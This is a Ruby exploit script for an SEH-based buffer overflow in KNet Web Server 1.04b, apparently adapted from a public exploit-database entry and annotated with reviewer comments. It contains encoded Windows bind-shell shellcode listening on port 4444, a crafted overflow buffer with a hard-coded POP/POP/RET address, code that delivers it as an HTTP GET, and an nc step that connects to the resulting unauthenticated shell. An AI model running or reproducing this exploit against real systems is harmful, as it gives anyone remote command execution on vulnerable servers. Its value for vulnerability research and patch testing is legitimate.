
# Title : KNet Web Server 1.04b - Buffer Overflow SEH
# Published : 2013-03-29
# Author :


#!/usr/bin/ruby

# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b 
# Tested on: Windows 7

require 'net/http'
require 'uri'
require 'socket'
############################################

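# Stage 2: bind shell listening on TCP/4444 on the victim (368 bytes).
#
# Opaque, pre-encoded bytes reproduced from the original listing. The
# leading fnstenv / pop edx sequence looks like a Metasploit
# shikata_ga_nai decoder stub, which rewrites itself in place and so
# needs a writable, executable stack -- TODO confirm against the original
# msfvenom invocation. The "\x" escapes were lost in transcription and are
# restored here: every "xHH" token is one byte, not three printable
# characters, otherwise nothing below lines up (the sled would be "x90x90...").
#
# NOTE(review): the bytes are not independently verified. Regenerate with
# msfvenom (windows/shell_bind_tcp LPORT=4444, same bad-char set) before
# relying on them, and remember the resulting shell is unauthenticated:
# anyone who can reach 4444 on the victim gets it.
sc_bind =
  "\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" \
  "\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" \
  "\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" \
  "\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" \
  "\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" \
  "\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\x64" \
  "\x88\x2e\x08\xbb\x7c\x85\x13\xec\x2c\x92\x5c\x14\x47\xfc" \
  "\x7c\x25\x84\x1e\x40\x6c\xa1\xd5\x32\x6f\x63\x24\xba\x41" \
  "\x4b\xeb\x85\x6d\x46\xf5\xc2\x4a\xb8\x80\x38\xa9\x45\x93" \
  "\xfa\xd3\x91\x16\x1f\x73\x52\x80\xfb\x85\xb7\x57\x8f\x8a" \
  "\x7c\x13\xd7\x8e\x83\xf0\x63\xaa\x08\xf7\xa3\x3a\x4a\xdc" \
  "\x67\x66\x09\x7d\x31\xc2\xfc\x82\x21\xaa\xa1\x26\x29\x59" \
  "\xb6\x51\x70\x36\x7b\x6c\x8b\xc6\x13\xe7\xf8\xf4\xbc\x53" \
  "\x97\xb4\x35\x7a\x60\xba\x6c\x3a\xfe\x45\x8e\x3b\xd6\x81" \
  "\xda\x6b\x40\x23\x62\xe0\x90\xcc\xb7\xa7\xc0\x62\x67\x08" \
  "\xb1\xc2\xd7\xe0\xdb\xcc\x08\x10\xe4\x06\x3f\x16\x2a\x72" \
  "\x6c\xf1\x4f\x84\x83\x5d\xd9\x62\xc9\x4d\x8f\x3d\x65\xac" \
  "\xf4\xf5\x12\xcf\xde\xa9\x8b\x47\x56\xa4\x0b\x67\x67\xe2" \
  "\x38\xc4\xcf\x65\xca\x06\xd4\x94\xcd\x02\x7c\xde\xf6\xc5" \
  "\xf6\x8e\xb5\x74\x06\x9b\x2d\x14\x95\x40\xad\x53\x86\xde" \
  "\xfa\x34\x78\x17\x6e\xa9\x23\x81\x8c\x30\xb5\xea\x14\xef" \
  "\x06\xf4\x95\x62\x32\xd2\x85\xba\xbb\x5e\xf1\x12\xea\x08" \
  "\xaf\xd4\x44\xfb\x19\x8f\x3b\x55\xcd\x56\x70\x66\x8b\x56" \
  "\x5d\x10\x73\xe6\x08\x65\x8c\xc7\xdc\x61\xf5\x35\x7d\x8d" \
  "\x2c\xfe\x8d\xc4\x6c\x57\x06\x81\xe5\xe5\x4b\x32\xd0\x2a" \
  "\x72\xb1\xd0\xd2\x81\xa9\x91\xd7\xce\x6d\x4a\xaa\x5f\x18" \
  "\x6c\x19\x5f\x09"

###########################################

# Stage 1: the SEH overwrite. Offsets are for KNet 1.04b on the Windows 7
# box named in the header; the SEH record is reached after 1234 bytes of
# the request-URI. Nothing in this buffer may contain a byte that ends the
# HTTP request line (0x00, 0x0a, 0x0d, 0x20) -- the payload above avoids
# them, which is presumably why it was encoded with a bad-char set.
PAD_TO_SEH = 1234

sploit = "\x90" * PAD_TO_SEH
# nSEH: JMP DWORD PTR [ESP+0x5C]  (FF 64 24 5C). Per the original author
# ESP+0x5C points at the shellcode once the handler below has returned here.
sploit += "\xFF\x64\x24\x5C"
# SEH: 0x6C2474E3 little-endian = POP ESI / POP EBP / RET in crtdll.dll.
# Hard-coded address: only valid for the crtdll.dll build and load
# address of the tested system; re-find it with mona/ROPgadget elsewhere.
sploit += "\xE3\x74\x24\x6C"
# NOP sled either side of the shellcode so the landing point has slack.
sploit += "\x90" * 80
sploit += sc_bind
sploit += "\x90" * 80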

########################################

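# Banner. The "\r\n" / "\n\n" escapes had been flattened to "rn" / "nn" in
# transcription; restored here.
BANNER = "KNet Web Server - Buffer Overflow SEH Exploit\r\n by Myo Soe, http://yehg.net/\n\n"
puts BANNER

# First argument: the victim as "host" or "host:port" (no scheme). nil when
# the script is run without arguments.
target = ARGV[0]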

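# Deliver the overflow: a single HTTP GET whose request-URI is the payload.
#
# t - victim as "host" or "host:port" (no scheme).
# s - raw payload bytes (the +sploit+ buffer); sent verbatim after "/".
#
# Returns the Net::HTTPResponse if the server answered, nil otherwise.
#
# The server is not expected to answer: if the overflow works, its thread
# is busy running the bind shell, so the read times out (or the connection
# is reset if it merely crashed). Those errors are reported rather than
# propagated, because the caller's Thread#join re-raises a thread's
# exception and would tear the script down while the nc session is live.
# Short timeouts replace Net::HTTP's default 60 s read wait.
def exploit(t, s)
  target = "http://#{t}"
  url = URI.parse(target)
  puts "[*] Sending exploit to #{target}...\n"
  Net::HTTP.start(url.hostname, url.port, open_timeout: 10, read_timeout: 15) do |http|
    http.get("/#{s}")
  end
rescue Net::OpenTimeout, Net::ReadTimeout, SocketError, SystemCallError, IOError => e
  puts "[!] #{e.class}: #{e.message} (no reply is expected once the shellcode runs)"
  nil
end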
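# Host part of a target given as "host", "host:port" or "[v6]:port". The
# bind shell listens on the victim's own port 4444, not on the web-server
# port, so the port suffix must not be handed to nc.
def shell_host(t)
  URI.parse("http://#{t}").hostname
end

# Attach to the bind shell once the overflow has had a moment to run.
#
# t - the same target string given to exploit().
#
# Returns true/false from nc's exit status, or nil if nc could not be run.
#
# nc is invoked in argv form (no shell), so an odd-looking target cannot
# be turned into extra shell commands, and a missing nc binary is
# reported instead of failing silently. The 1 s delay is the original
# author's estimate of how long the server needs to start listening.
def connect(t)
  sleep(1)
  host = shell_host(t)
  puts "[*] Opening Shell ..\n\n"
  status = system('nc', host, '4444')
  puts "[!] could not run nc; connect to #{host}:4444 manually" if status.nil?
  status
end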
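# Usage: ruby <this script> <host[:port]>
#
# Overflow and shell connect run concurrently on purpose: the GET never
# gets an answer once the shellcode runs, so a sequential script would
# sit in the request until its timeout before ever starting nc.
abort("usage: #{$PROGRAM_NAME} <host[:port]>") if target.nil? || target.empty?

t1 = Thread.new { exploit(target, sploit) }
t2 = Thread.new { connect(target) }
t1.join
t2.join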